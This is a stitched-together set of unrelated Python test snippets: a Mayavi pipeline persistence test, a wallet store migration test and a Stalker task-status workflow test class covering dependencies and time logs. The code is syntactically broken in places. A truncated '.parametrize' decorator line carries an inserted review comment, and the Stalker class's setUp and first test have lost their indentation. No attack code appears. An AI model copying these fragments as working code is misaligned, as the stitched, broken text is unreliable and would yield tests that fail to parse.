        """Build the pipeline, then re-assign, persist and copy it, checking
        the configuration after each step."""
        script = self.script
        from mayavi.sources.array_source import ArraySource
        from mayavi.modules.outline import Outline
        from mayavi.modules.glyph import Glyph
        from mayavi.modules.vector_cut_plane import VectorCutPlane
        s = self.new_scene()
        d = ArraySource()
        (sc, vec) = self.make_data()
        d.origin = ((- 5), (- 5), (- 5))
        d.scalar_data = sc
        d.vector_data = vec
        script.add_source(d)
        o = Outline()
        script.add_module(o)
        g = Glyph()
        script.add_module(g)
        g.glyph.glyph_source.glyph_position = 'center'
        g.glyph.glyph.vector_mode = 'use_normal'
        g.glyph.glyph.scale_factor = 0.5
        g.actor.property.line_width = 1.0
        v = VectorCutPlane()
        glyph = v.glyph
        gs = glyph.glyph_source
        gs.glyph_position = 'tail'
        gs.glyph_source = gs.glyph_list[1]
        script.add_module(v)
        v.implicit_plane.trait_set(normal=(0, 1, 0), origin=(0, 3, 0))
        v = VectorCutPlane()
        glyph = v.glyph
        gs = glyph.glyph_source
        gs.glyph_source = gs.glyph_list[2]
        gs.glyph_position = 'head'
        script.add_module(v)
        v.implicit_plane.trait_set(normal=(0, 1, 0), origin=(0, (- 2), 0))
        self.set_view(s)
        self.check()
        # Re-create and re-assign actors/glyphs/planes to exercise trait handlers.
        g.actor = g.actor.__class__()
        glyph = g.glyph
        g.glyph = glyph.__class__()
        g.glyph = glyph
        glyph = v.glyph
        v.glyph = glyph.__class__()
        v.glyph = glyph
        v.actor = v.actor.__class__()
        v.cutter = v.cutter.__class__()
        ip = v.implicit_plane
        v.implicit_plane = ip.__class__()
        v.implicit_plane = ip
        s.render()
        self.check()
        # Persistence round trip through an in-memory file.
        f = BytesIO()
        f.name = abspath('test.mv2')
        script.save_visualization(f)
        f.seek(0)
        engine = script.engine
        engine.close_scene(s)
        script.load_visualization(f)
        s = engine.current_scene
        self.set_view(s)
        self.check()
        # Detach and re-attach the sources, then deep-copy and re-assign them.
        sources = s.children
        s.children = []
        s.children.extend(sources)
        self.set_view(s)
        self.check()
        sources1 = copy.deepcopy(sources)
        s.children[:] = sources
        self.set_view(s)
        self.check()
# NOTE(review): the line below looks like a truncated `@pytest.mark.parametrize`
# decorator (extraction artifact) — as written it is not valid syntax; confirm
# against the original file.
.parametrize('data', ({}, {'seed_version': (MIGRATION_FIRST - 1)}, {'seed_version': (MIGRATION_FIRST + 1)}))
def test_database_store_from_text_store_initial_version(tmp_path, data) -> None:
    """Converting a text store whose seed_version is missing or not exactly
    MIGRATION_FIRST must fail with an AssertionError; the store is always
    closed afterwards."""
    wallet_path = os.path.join(tmp_path, 'database')
    text_store = TextStore(wallet_path, data=data)
    try:
        with pytest.raises(AssertionError):
            DatabaseStore.from_text_store(text_store)
    finally:
        text_store.close()
class TaskStatusWorkflowTestCase(unittest.TestCase):
def setUp(self):
super(self.__class__, self).setUp()
from stalker import User
self.test_user1 = User(name='Test User 1', login='tuser1', email='', password='secret')
self.test_user2 = User(name='Test User 2', login='tuser2', email='', password='secret')
from stalker import Status
self.status_new = Status(name='New', code='NEW')
self.status_wfd = Status(name='Waiting For Dependency', code='WFD')
self.status_rts = Status(name='Ready To Start', code='RTS')
self.status_wip = Status(name='Work In Progress', code='WIP')
self.status_prev = Status(name='Pending Review', code='PREV')
self.status_hrev = Status(name='Has Revision', code='HREV')
self.status_drev = Status(name='Dependency Has Revision', code='DREV')
self.status_oh = Status(name='On Hold', code='OH')
self.status_stop = Status(name='Stopped', code='STOP')
self.status_cmpl = Status(name='Completed', code='CMPL')
self.status_rrev = Status(name='Requested Revision', code='RREV')
self.status_app = Status(name='Approved', code='APP')
from stalker import StatusList
self.test_project_status_list = StatusList(name='Project Statuses', target_entity_type='Project', statuses=[self.status_wfd, self.status_wip, self.status_cmpl])
self.test_task_status_list = StatusList(name='Task Statuses', statuses=[self.status_wfd, self.status_rts, self.status_wip, self.status_prev, self.status_hrev, self.status_drev, self.status_oh, self.status_stop, self.status_cmpl], target_entity_type='Task')
from stalker import Repository
self.test_repo = Repository(name='Test Repository', code='TR', linux_path='/mnt/T/', windows_path='T:/', osx_path='/Volumes/T')
from stalker import Project
self.test_project1 = Project(name='Test Project 1', code='TProj1', status_list=self.test_project_status_list, repository=self.test_repo, start=datetime.datetime(2013, 6, 20, 0, 0, 0, tzinfo=pytz.utc), end=datetime.datetime(2013, 6, 30, 0, 0, 0, tzinfo=pytz.utc))
from stalker import Task
self.test_task1 = Task(name='Test Task 1', project=self.test_project1, responsible=[self.test_user1], status_list=self.test_task_status_list, start=datetime.datetime(2013, 6, 20, 0, 0, tzinfo=pytz.utc), end=datetime.datetime(2013, 6, 30, 0, 0, tzinfo=pytz.utc), schedule_timing=10, schedule_unit='d', schedule_model='effort')
self.test_task2 = Task(name='Test Task 2', project=self.test_project1, responsible=[self.test_user1], status_list=self.test_task_status_list, start=datetime.datetime(2013, 6, 20, 0, 0, tzinfo=pytz.utc), end=datetime.datetime(2013, 6, 30, 0, 0, tzinfo=pytz.utc), schedule_timing=10, schedule_unit='d', schedule_model='effort')
self.test_task3 = Task(name='Test Task 3', project=self.test_project1, status_list=self.test_task_status_list, resources=[self.test_user1, self.test_user2], responsible=[self.test_user1, self.test_user2], start=datetime.datetime(2013, 6, 20, 0, 0, tzinfo=pytz.utc), end=datetime.datetime(2013, 6, 30, 0, 0, tzinfo=pytz.utc), schedule_timing=10, schedule_unit='d', schedule_model='effort')
self.test_task4 = Task(name='Test Task 4', parent=self.test_task1, status=self.status_wfd, status_list=self.test_task_status_list, resources=[self.test_user1], depends=[self.test_task3], start=datetime.datetime(2013, 6, 20, 0, 0, tzinfo=pytz.utc), end=datetime.datetime(2013, 6, 30, 0, 0, tzinfo=pytz.utc), schedule_timing=10, schedule_unit='d', schedule_model='effort')
self.test_task5 = Task(name='Test Task 5', parent=self.test_task1, status_list=self.test_task_status_list, resources=[self.test_user1], depends=[self.test_task4], start=datetime.datetime(2013, 6, 20, 0, 0, tzinfo=pytz.utc), end=datetime.datetime(2013, 6, 30, 0, 0, tzinfo=pytz.utc), schedule_timing=10, schedule_unit='d', schedule_model='effort')
self.test_task6 = Task(name='Test Task 6', parent=self.test_task1, status_list=self.test_task_status_list, resources=[self.test_user1], start=datetime.datetime(2013, 6, 20, 0, 0, tzinfo=pytz.utc), end=datetime.datetime(2013, 6, 30, 0, 0, tzinfo=pytz.utc), schedule_timing=10, schedule_unit='d', schedule_model='effort')
self.test_task7 = Task(name='Test Task 7', parent=self.test_task2, status_list=self.test_task_status_list, resources=[self.test_user2], start=datetime.datetime(2013, 6, 20, 0, 0, tzinfo=pytz.utc), end=datetime.datetime(2013, 6, 30, 0, 0, tzinfo=pytz.utc), schedule_timing=10, schedule_unit='d', schedule_model='effort')
self.test_task8 = Task(name='Test Task 8', parent=self.test_task2, status_list=self.test_task_status_list, resources=[self.test_user2], start=datetime.datetime(2013, 6, 20, 0, 0, tzinfo=pytz.utc), end=datetime.datetime(2013, 6, 30, 0, 0, tzinfo=pytz.utc), schedule_timing=10, schedule_unit='d', schedule_model='effort')
self.test_asset_status_list = StatusList(name='Asset Statuses', statuses=[self.status_wfd, self.status_rts, self.status_wip, self.status_prev, self.status_hrev, self.status_drev, self.status_oh, self.status_stop, self.status_cmpl], target_entity_type='Asset')
from stalker import Asset, Type
self.test_asset1 = Asset(name='Test Asset 1', code='TA1', parent=self.test_task7, type=Type(name='Character', code='Char', target_entity_type='Asset'), status_list=self.test_asset_status_list)
self.test_task9 = Task(name='Test Task 9', parent=self.test_asset1, status_list=self.test_task_status_list, start=datetime.datetime(2013, 6, 20, 0, 0, tzinfo=pytz.utc), end=datetime.datetime(2013, 6, 30, 0, 0, tzinfo=pytz.utc), resources=[self.test_user2], schedule_timing=10, schedule_unit='d', schedule_model='effort')
self.all_tasks = [self.test_task1, self.test_task2, self.test_task3, self.test_task4, self.test_task5, self.test_task6, self.test_task7, self.test_task8, self.test_task9, self.test_asset1]
def test_walk_hierarchy_is_working_properly(self):
visited_tasks = []
expected_result = [self.test_task2, self.test_task7, self.test_task8, self.test_asset1, self.test_task9]
for task in self.test_task2.walk_hierarchy(method=1):
visited_tasks.append(task)
assert (expected_result == visited_tasks)
def test_walk_dependencies_is_working_properly(self):
    """walk_dependencies() yields dependencies transitively; shared dependencies are revisited."""
    visited_tasks = []
    # task4/task8/task3 appear more than once: reachable through multiple paths
    expected_result = [self.test_task9, self.test_task6, self.test_task4, self.test_task5, self.test_task8, self.test_task3, self.test_task4, self.test_task8, self.test_task3]
    self.test_task9.depends = [self.test_task6]
    self.test_task6.depends = [self.test_task4, self.test_task5]
    self.test_task5.depends = [self.test_task4]
    self.test_task4.depends = [self.test_task8, self.test_task3]
    for task in self.test_task9.walk_dependencies():
        visited_tasks.append(task)
    assert (expected_result == visited_tasks)
def test_leaf_WFD_task_updated_to_have_a_dependency_of_WFD_task_task(self):
    """A WFD leaf task stays WFD when a WFD dependency is appended."""
    self.test_task3.depends = []
    # depending on a WIP task first drives task3 to WFD
    self.test_task9.status = self.status_wip
    assert (self.test_task9.status == self.status_wip)
    self.test_task3.depends.append(self.test_task9)
    assert (self.test_task3.status == self.status_wfd)
    self.test_task8.status = self.status_wfd
    assert (self.test_task8.status == self.status_wfd)
    self.test_task3.depends.append(self.test_task8)
    assert (self.test_task3.status == self.status_wfd)
def test_leaf_WFD_task_updated_to_have_a_dependency_of_RTS_task(self):
    """A WFD leaf task stays WFD when an RTS dependency is appended."""
    self.test_task3.depends = []
    # depending on a WIP task first drives task3 to WFD
    self.test_task9.status = self.status_wip
    assert (self.test_task9.status == self.status_wip)
    self.test_task3.depends.append(self.test_task9)
    assert (self.test_task3.status == self.status_wfd)
    self.test_task8.status = self.status_rts
    assert (self.test_task8.status == self.status_rts)
    self.test_task3.depends.append(self.test_task8)
    assert (self.test_task3.status == self.status_wfd)
def test_leaf_WFD_task_updated_to_have_a_dependency_of_WIP_task(self):
    """A WFD leaf task stays WFD when a WIP dependency is appended."""
    self.test_task3.depends = []
    # depending on a WIP task first drives task3 to WFD
    self.test_task9.status = self.status_wip
    assert (self.test_task9.status == self.status_wip)
    self.test_task3.depends.append(self.test_task9)
    assert (self.test_task3.status == self.status_wfd)
    self.test_task8.status = self.status_wip
    assert (self.test_task8.status == self.status_wip)
    self.test_task3.depends.append(self.test_task8)
    assert (self.test_task3.status == self.status_wfd)
def test_leaf_WFD_task_updated_to_have_a_dependency_of_PREV_task(self):
    """A WFD leaf task stays WFD when a PREV dependency is appended."""
    self.test_task3.depends = []
    # depending on a WIP task first drives task3 to WFD
    self.test_task9.status = self.status_wip
    assert (self.test_task9.status == self.status_wip)
    self.test_task3.depends.append(self.test_task9)
    assert (self.test_task3.status == self.status_wfd)
    self.test_task8.status = self.status_prev
    assert (self.test_task8.status == self.status_prev)
    self.test_task3.depends.append(self.test_task8)
    assert (self.test_task3.status == self.status_wfd)
def test_leaf_WFD_task_updated_to_have_a_dependency_of_HREV_task(self):
    """A WFD leaf task stays WFD when an HREV dependency is appended."""
    self.test_task3.depends = []
    # depending on a WIP task first drives task3 to WFD
    self.test_task9.status = self.status_wip
    assert (self.test_task9.status == self.status_wip)
    self.test_task3.depends.append(self.test_task9)
    assert (self.test_task3.status == self.status_wfd)
    self.test_task8.status = self.status_hrev
    assert (self.test_task8.status == self.status_hrev)
    self.test_task3.depends.append(self.test_task8)
    assert (self.test_task3.status == self.status_wfd)
def test_leaf_WFD_task_updated_to_have_a_dependency_of_OH_task(self):
    """A WFD leaf task stays WFD when an OH dependency is appended."""
    self.test_task3.depends = []
    # depending on a WIP task first drives task3 to WFD
    self.test_task9.status = self.status_wip
    assert (self.test_task9.status == self.status_wip)
    self.test_task3.depends.append(self.test_task9)
    assert (self.test_task3.status == self.status_wfd)
    self.test_task8.status = self.status_oh
    assert (self.test_task8.status == self.status_oh)
    self.test_task3.depends.append(self.test_task8)
    assert (self.test_task3.status == self.status_wfd)
def test_leaf_WFD_task_updated_to_have_a_dependency_of_STOP_task(self):
    """A WFD leaf task stays WFD when a STOP dependency is appended."""
    self.test_task3.depends = []
    # depending on a WIP task first drives task3 to WFD
    self.test_task9.status = self.status_wip
    assert (self.test_task9.status == self.status_wip)
    self.test_task3.depends.append(self.test_task9)
    assert (self.test_task3.status == self.status_wfd)
    self.test_task8.status = self.status_stop
    assert (self.test_task8.status == self.status_stop)
    self.test_task3.depends.append(self.test_task8)
    assert (self.test_task3.status == self.status_wfd)
def test_leaf_WFD_task_updated_to_have_a_dependency_of_CMPL_task(self):
    """A WFD leaf task stays WFD when a CMPL dependency is appended (WIP dep still pending)."""
    self.test_task3.depends = []
    # depending on a WIP task first drives task3 to WFD
    self.test_task9.status = self.status_wip
    assert (self.test_task9.status == self.status_wip)
    self.test_task3.depends.append(self.test_task9)
    assert (self.test_task3.status == self.status_wfd)
    self.test_task8.status = self.status_cmpl
    assert (self.test_task8.status == self.status_cmpl)
    self.test_task3.depends.append(self.test_task8)
    assert (self.test_task3.status == self.status_wfd)
def test_leaf_RTS_task_updated_to_have_a_dependency_of_WFD_task_task(self):
    """An RTS leaf task becomes WFD when a WFD dependency is appended."""
    self.test_task3.depends = []
    self.test_task3.status = self.status_rts
    assert (self.test_task3.status == self.status_rts)
    self.test_task8.status = self.status_wfd
    assert (self.test_task8.status == self.status_wfd)
    self.test_task3.depends.append(self.test_task8)
    assert (self.test_task3.status == self.status_wfd)
def test_leaf_RTS_task_updated_to_have_a_dependency_of_RTS_task(self):
    """An RTS leaf task becomes WFD when an RTS dependency is appended."""
    self.test_task3.depends = []
    self.test_task3.status = self.status_rts
    assert (self.test_task3.status == self.status_rts)
    self.test_task8.status = self.status_rts
    assert (self.test_task8.status == self.status_rts)
    self.test_task3.depends.append(self.test_task8)
    assert (self.test_task3.status == self.status_wfd)
def test_leaf_RTS_task_updated_to_have_a_dependency_of_WIP_task(self):
    """An RTS leaf task becomes WFD when a WIP dependency is appended."""
    self.test_task3.depends = []
    self.test_task3.status = self.status_rts
    assert (self.test_task3.status == self.status_rts)
    self.test_task8.status = self.status_wip
    assert (self.test_task8.status == self.status_wip)
    self.test_task3.depends.append(self.test_task8)
    assert (self.test_task3.status == self.status_wfd)
def test_leaf_RTS_task_updated_to_have_a_dependency_of_PREV_task(self):
    """An RTS leaf task becomes WFD when a PREV dependency is appended."""
    self.test_task3.depends = []
    self.test_task3.status = self.status_rts
    assert (self.test_task3.status == self.status_rts)
    self.test_task8.status = self.status_prev
    assert (self.test_task8.status == self.status_prev)
    self.test_task3.depends.append(self.test_task8)
    assert (self.test_task3.status == self.status_wfd)
def test_leaf_RTS_task_updated_to_have_a_dependency_of_HREV_task(self):
    """An RTS leaf task becomes WFD when an HREV dependency is appended."""
    self.test_task3.depends = []
    self.test_task3.status = self.status_rts
    assert (self.test_task3.status == self.status_rts)
    self.test_task8.status = self.status_hrev
    assert (self.test_task8.status == self.status_hrev)
    self.test_task3.depends.append(self.test_task8)
    assert (self.test_task3.status == self.status_wfd)
def test_leaf_RTS_task_updated_to_have_a_dependency_of_OH_task(self):
    """An RTS leaf task becomes WFD when an OH dependency is appended."""
    self.test_task3.depends = []
    self.test_task3.status = self.status_rts
    assert (self.test_task3.status == self.status_rts)
    self.test_task8.status = self.status_oh
    assert (self.test_task8.status == self.status_oh)
    self.test_task3.depends.append(self.test_task8)
    assert (self.test_task3.status == self.status_wfd)
def test_leaf_RTS_task_updated_to_have_a_dependency_of_STOP_task(self):
    """An RTS leaf task STAYS RTS when a STOP dependency is appended (STOP counts as finished)."""
    self.test_task3.depends = []
    self.test_task3.status = self.status_rts
    assert (self.test_task3.status == self.status_rts)
    self.test_task8.status = self.status_stop
    assert (self.test_task8.status == self.status_stop)
    self.test_task3.depends.append(self.test_task8)
    assert (self.test_task3.status == self.status_rts)
def test_leaf_RTS_task_updated_to_have_a_dependency_of_CMPL_task(self):
    """An RTS leaf task STAYS RTS when a CMPL dependency is appended.

    Fix: every sibling test resets the dependency list explicitly; the
    original asserted `depends == []` instead, which made this test
    depend on fixture/test-execution order rather than enforcing the
    precondition itself.
    """
    self.test_task3.depends = []
    self.test_task3.status = self.status_rts
    assert (self.test_task3.status == self.status_rts)
    self.test_task8.status = self.status_cmpl
    assert (self.test_task8.status == self.status_cmpl)
    self.test_task3.depends.append(self.test_task8)
    assert (self.test_task3.status == self.status_rts)
def test_leaf_WIP_task_dependency_can_not_be_updated(self):
    """Appending a dependency to a WIP leaf task raises StatusError."""
    self.test_task3.depends = []
    self.test_task3.status = self.status_wip
    assert (self.test_task3.status == self.status_wip)
    from stalker.exceptions import StatusError
    with pytest.raises(StatusError) as cm:
        self.test_task3.depends.append(self.test_task8)
    assert (str(cm.value) == 'This is a WIP task and it is not allowed to change the dependencies of a WIP task')
def test_leaf_PREV_task_dependency_can_not_be_updated(self):
    """Appending a dependency to a PREV leaf task raises StatusError."""
    self.test_task3.depends = []
    self.test_task3.status = self.status_prev
    assert (self.test_task3.status == self.status_prev)
    from stalker.exceptions import StatusError
    with pytest.raises(StatusError) as cm:
        self.test_task3.depends.append(self.test_task8)
    assert (str(cm.value) == 'This is a PREV task and it is not allowed to change the dependencies of a PREV task')
def test_leaf_HREV_task_dependency_can_not_be_updated(self):
    """Appending a dependency to an HREV leaf task raises StatusError."""
    self.test_task3.depends = []
    self.test_task3.status = self.status_hrev
    assert (self.test_task3.status == self.status_hrev)
    from stalker.exceptions import StatusError
    with pytest.raises(StatusError) as cm:
        self.test_task3.depends.append(self.test_task8)
    assert (str(cm.value) == 'This is a HREV task and it is not allowed to change the dependencies of a HREV task')
def test_leaf_DREV_task_dependency_can_not_be_updated(self):
    """Appending a dependency to a DREV leaf task raises StatusError."""
    self.test_task3.depends = []
    self.test_task3.status = self.status_drev
    assert (self.test_task3.status == self.status_drev)
    from stalker.exceptions import StatusError
    with pytest.raises(StatusError) as cm:
        self.test_task3.depends.append(self.test_task8)
    assert (str(cm.value) == 'This is a DREV task and it is not allowed to change the dependencies of a DREV task')
def test_leaf_OH_task_dependency_can_not_be_updated(self):
    """Appending a dependency to an OH leaf task raises StatusError."""
    self.test_task3.depends = []
    self.test_task3.status = self.status_oh
    assert (self.test_task3.status == self.status_oh)
    from stalker.exceptions import StatusError
    with pytest.raises(StatusError) as cm:
        self.test_task3.depends.append(self.test_task8)
    assert (str(cm.value) == 'This is a OH task and it is not allowed to change the dependencies of a OH task')
def test_leaf_STOP_task_dependency_can_not_be_updated(self):
    """Appending a dependency to a STOP leaf task raises StatusError."""
    self.test_task3.depends = []
    self.test_task3.status = self.status_stop
    assert (self.test_task3.status == self.status_stop)
    from stalker.exceptions import StatusError
    with pytest.raises(StatusError) as cm:
        self.test_task3.depends.append(self.test_task8)
    assert (str(cm.value) == 'This is a STOP task and it is not allowed to change the dependencies of a STOP task')
def test_leaf_CMPL_task_dependency_can_not_be_updated(self):
    """Appending a dependency to a CMPL leaf task raises StatusError."""
    self.test_task3.depends = []
    self.test_task3.status = self.status_cmpl
    assert (self.test_task3.status == self.status_cmpl)
    from stalker.exceptions import StatusError
    with pytest.raises(StatusError) as cm:
        self.test_task3.depends.append(self.test_task8)
    assert (str(cm.value) == 'This is a CMPL task and it is not allowed to change the dependencies of a CMPL task')
def test_container_RTS_task_updated_to_have_a_dependency_of_WFD_task_task(self):
    """An RTS container task becomes WFD when a WFD dependency is appended."""
    self.test_task3.depends = []
    self.test_task8.status = self.status_wfd
    assert (self.test_task8.status == self.status_wfd)
    # make task3 a container by giving it a child
    self.test_task3.children.append(self.test_task2)
    self.test_task2.status = self.status_rts
    self.test_task3.status = self.status_rts
    assert (self.test_task3.status == self.status_rts)
    self.test_task3.depends.append(self.test_task8)
    assert (self.test_task3.status == self.status_wfd)
def test_container_RTS_task_updated_to_have_a_dependency_of_RTS_task(self):
    """An RTS container task becomes WFD when an RTS dependency is appended."""
    self.test_task3.depends = []
    self.test_task8.status = self.status_rts
    assert (self.test_task8.status == self.status_rts)
    # make task3 a container by giving it a child
    self.test_task3.children.append(self.test_task2)
    self.test_task2.status = self.status_rts
    self.test_task3.status = self.status_rts
    assert (self.test_task3.status == self.status_rts)
    self.test_task3.depends.append(self.test_task8)
    assert (self.test_task3.status == self.status_wfd)
def test_container_RTS_task_updated_to_have_a_dependency_of_WIP_task(self):
    """An RTS container task becomes WFD when a WIP dependency is appended."""
    self.test_task3.depends = []
    self.test_task8.status = self.status_wip
    assert (self.test_task8.status == self.status_wip)
    # make task3 a container by giving it a child
    self.test_task3.children.append(self.test_task2)
    self.test_task2.status = self.status_rts
    self.test_task3.status = self.status_rts
    assert (self.test_task3.status == self.status_rts)
    self.test_task3.depends.append(self.test_task8)
    assert (self.test_task3.status == self.status_wfd)
def test_container_RTS_task_updated_to_have_a_dependency_of_PREV_task(self):
    """An RTS container task becomes WFD when a PREV dependency is appended."""
    self.test_task3.depends = []
    self.test_task8.status = self.status_prev
    assert (self.test_task8.status == self.status_prev)
    # make task3 a container by giving it a child
    self.test_task3.children.append(self.test_task2)
    self.test_task2.status = self.status_rts
    self.test_task3.status = self.status_rts
    assert (self.test_task3.status == self.status_rts)
    self.test_task3.depends.append(self.test_task8)
    assert (self.test_task3.status == self.status_wfd)
def test_container_RTS_task_updated_to_have_a_dependency_of_HREV_task(self):
    """An RTS container task becomes WFD when an HREV dependency is appended."""
    self.test_task3.depends = []
    self.test_task8.status = self.status_hrev
    assert (self.test_task8.status == self.status_hrev)
    # make task3 a container by giving it a child
    self.test_task3.children.append(self.test_task2)
    self.test_task2.status = self.status_rts
    self.test_task3.status = self.status_rts
    assert (self.test_task3.status == self.status_rts)
    self.test_task3.depends.append(self.test_task8)
    assert (self.test_task3.status == self.status_wfd)
def test_container_RTS_task_updated_to_have_a_dependency_of_OH_task(self):
    """An RTS container task becomes WFD when an OH dependency is appended."""
    self.test_task3.depends = []
    self.test_task8.status = self.status_oh
    assert (self.test_task8.status == self.status_oh)
    # make task3 a container by giving it a child
    self.test_task3.children.append(self.test_task2)
    self.test_task2.status = self.status_rts
    self.test_task3.status = self.status_rts
    assert (self.test_task3.status == self.status_rts)
    self.test_task3.depends.append(self.test_task8)
    assert (self.test_task3.status == self.status_wfd)
def test_container_RTS_task_updated_to_have_a_dependency_of_STOP_task(self):
    """An RTS container task STAYS RTS when a STOP dependency is appended (STOP counts as finished)."""
    self.test_task3.depends = []
    self.test_task8.status = self.status_stop
    assert (self.test_task8.status == self.status_stop)
    # make task3 a container by giving it a child
    self.test_task3.children.append(self.test_task2)
    self.test_task2.status = self.status_rts
    self.test_task3.status = self.status_rts
    assert (self.test_task3.status == self.status_rts)
    self.test_task3.depends.append(self.test_task8)
    assert (self.test_task3.status == self.status_rts)
def test_container_WIP_task_dependency_can_not_be_updated(self):
    """Appending a dependency to a WIP container task raises StatusError."""
    self.test_task1.depends = []
    self.test_task1.status = self.status_wip
    assert (self.test_task1.status == self.status_wip)
    from stalker.exceptions import StatusError
    with pytest.raises(StatusError) as cm:
        self.test_task1.depends.append(self.test_task8)
    assert (str(cm.value) == 'This is a WIP task and it is not allowed to change the dependencies of a WIP task')
def test_container_CMPL_task_dependency_can_not_be_updated(self):
    """Appending a dependency to a CMPL container task raises StatusError."""
    self.test_task1.status = self.status_cmpl
    assert (self.test_task1.status == self.status_cmpl)
    from stalker.exceptions import StatusError
    with pytest.raises(StatusError) as cm:
        self.test_task1.depends.append(self.test_task8)
    assert (str(cm.value) == 'This is a CMPL task and it is not allowed to change the dependencies of a CMPL task')
def test_create_time_log_in_WFD_leaf_task(self):
    """create_time_log() on a WFD leaf task raises StatusError."""
    self.test_task3.status = self.status_wfd
    resource = self.test_task3.resources[0]
    start = datetime.datetime.now(pytz.utc)
    end = (datetime.datetime.now(pytz.utc) + datetime.timedelta(hours=1))
    from stalker.exceptions import StatusError
    with pytest.raises(StatusError) as cm:
        self.test_task3.create_time_log(resource, start, end)
    assert (str(cm.value) == 'Test Task 3 is a WFD task, and it is not allowed to create TimeLogs for a WFD task, please supply a RTS, WIP, HREV or DREV task!')
def test_create_time_log_in_RTS_leaf_task_status_updated_to_WIP(self):
    """Logging time on an RTS leaf task flips its status to WIP."""
    self.test_task9.status = self.status_rts
    resource = self.test_task9.resources[0]
    start = datetime.datetime.now(pytz.utc)
    end = (datetime.datetime.now(pytz.utc) + datetime.timedelta(hours=1))
    self.test_task9.create_time_log(resource, start, end)
    assert (self.test_task9.status == self.status_wip)
def test_create_time_log_in_RTS_leaf_task_update_parent_status(self):
    """Logging time on an RTS leaf task also flips its parent container to WIP."""
    self.test_task2.status = self.status_rts
    self.test_task8.status = self.status_rts
    assert (self.test_task8.parent == self.test_task2)
    dt = datetime.datetime
    td = datetime.timedelta
    now = dt.now(pytz.utc)
    self.test_task8.create_time_log(resource=self.test_task8.resources[0], start=now, end=(now + td(hours=1)))
    assert (self.test_task8.status == self.status_wip)
    assert (self.test_task2.status == self.status_wip)
def test_create_time_log_in_RTS_root_task_no_parent_no_problem(self):
    """Logging time on a parentless RTS task works; status becomes WIP."""
    self.test_task3.status = self.status_rts
    resource = self.test_task3.resources[0]
    start = datetime.datetime.now(pytz.utc)
    end = (datetime.datetime.now(pytz.utc) + datetime.timedelta(hours=1))
    self.test_task3.create_time_log(resource, start, end)
    assert (self.test_task3.status == self.status_wip)
def test_create_time_log_in_WIP_leaf_task(self):
    """Logging time on a WIP leaf task keeps it WIP."""
    self.test_task9.status = self.status_wip
    resource = self.test_task9.resources[0]
    start = datetime.datetime.now(pytz.utc)
    end = (datetime.datetime.now(pytz.utc) + datetime.timedelta(hours=1))
    self.test_task9.create_time_log(resource, start, end)
    assert (self.test_task9.status == self.status_wip)
def test_create_time_log_in_PREV_leaf_task(self):
    """Logging time on a PREV leaf task is allowed and keeps the PREV status."""
    self.test_task3.status = self.status_prev
    resource = self.test_task3.resources[0]
    start = datetime.datetime.now(pytz.utc)
    end = (datetime.datetime.now(pytz.utc) + datetime.timedelta(hours=1))
    assert (self.test_task3.status == self.status_prev)
    tlog = self.test_task3.create_time_log(resource, start, end)
    from stalker import TimeLog
    assert isinstance(tlog, TimeLog)
    assert (self.test_task3.status == self.status_prev)
def test_create_time_log_in_HREV_leaf_task(self):
    """Logging time on an HREV leaf task flips it to WIP."""
    self.test_task9.status = self.status_hrev
    resource = self.test_task9.resources[0]
    start = datetime.datetime.now(pytz.utc)
    end = (datetime.datetime.now(pytz.utc) + datetime.timedelta(hours=1))
    self.test_task9.create_time_log(resource, start, end)
    assert (self.test_task9.status == self.status_wip)
def test_create_time_log_in_DREV_leaf_task(self):
    """Logging time on a DREV leaf task keeps it DREV."""
    self.test_task9.status = self.status_drev
    resource = self.test_task9.resources[0]
    start = datetime.datetime.now(pytz.utc)
    end = (datetime.datetime.now(pytz.utc) + datetime.timedelta(hours=1))
    self.test_task9.create_time_log(resource, start, end)
    assert (self.test_task9.status == self.status_drev)
def test_create_time_log_in_OH_leaf_task(self):
    """create_time_log() on an OH leaf task raises StatusError."""
    self.test_task9.status = self.status_oh
    resource = self.test_task9.resources[0]
    start = datetime.datetime.now(pytz.utc)
    end = (datetime.datetime.now(pytz.utc) + datetime.timedelta(hours=1))
    from stalker.exceptions import StatusError
    with pytest.raises(StatusError) as cm:
        self.test_task9.create_time_log(resource, start, end)
    assert (str(cm.value) == 'Test Task 9 is a OH task, and it is not allowed to create TimeLogs for a OH task, please supply a RTS, WIP, HREV or DREV task!')
def test_create_time_log_in_STOP_leaf_task(self):
    """create_time_log() on a STOP leaf task raises StatusError."""
    self.test_task9.status = self.status_stop
    resource = self.test_task9.resources[0]
    start = datetime.datetime.now(pytz.utc)
    end = (datetime.datetime.now(pytz.utc) + datetime.timedelta(hours=1))
    from stalker.exceptions import StatusError
    with pytest.raises(StatusError) as cm:
        self.test_task9.create_time_log(resource, start, end)
    assert (str(cm.value) == 'Test Task 9 is a STOP task, and it is not allowed to create TimeLogs for a STOP task, please supply a RTS, WIP, HREV or DREV task!')
def test_create_time_log_in_CMPL_leaf_task(self):
    """create_time_log() on a CMPL leaf task raises StatusError."""
    self.test_task9.status = self.status_cmpl
    resource = self.test_task9.resources[0]
    start = datetime.datetime.now(pytz.utc)
    end = (datetime.datetime.now(pytz.utc) + datetime.timedelta(hours=1))
    from stalker.exceptions import StatusError
    with pytest.raises(StatusError) as cm:
        self.test_task9.create_time_log(resource, start, end)
    assert (str(cm.value) == 'Test Task 9 is a CMPL task, and it is not allowed to create TimeLogs for a CMPL task, please supply a RTS, WIP, HREV or DREV task!')
def test_create_time_log_on_container_task(self):
    """create_time_log() on a container task raises ValueError."""
    start = datetime.datetime.now(pytz.utc)
    end = (datetime.datetime.now(pytz.utc) + datetime.timedelta(hours=1))
    # pin the id so the expected error message is deterministic
    self.test_task2.id = 36
    with pytest.raises(ValueError) as cm:
        self.test_task2.create_time_log(resource=None, start=start, end=end)
    assert (str(cm.value) == 'Test Task 2 (id: 36) is a container task, and it is not allowed to create TimeLogs for a container task')
def test_create_time_log_is_creating_time_logs(self):
    """create_time_log() appends TimeLogs and accumulates total_logged_seconds."""
    assert (len(self.test_task3.time_logs) == 0)
    now = datetime.datetime.now(pytz.utc)
    self.test_task3.create_time_log(resource=self.test_task3.resources[0], start=now, end=(now + datetime.timedelta(hours=1)))
    assert (len(self.test_task3.time_logs) == 1)
    assert (self.test_task3.total_logged_seconds == 3600)
    now = datetime.datetime.now(pytz.utc)
    # second, non-overlapping hour doubles the total
    self.test_task3.create_time_log(resource=self.test_task3.resources[0], start=(now + datetime.timedelta(hours=1)), end=(now + datetime.timedelta(hours=2)))
    assert (len(self.test_task3.time_logs) == 2)
    assert (self.test_task3.total_logged_seconds == 7200)
def test_create_time_log_returns_time_log_instance(self):
    """create_time_log() returns the created TimeLog instance."""
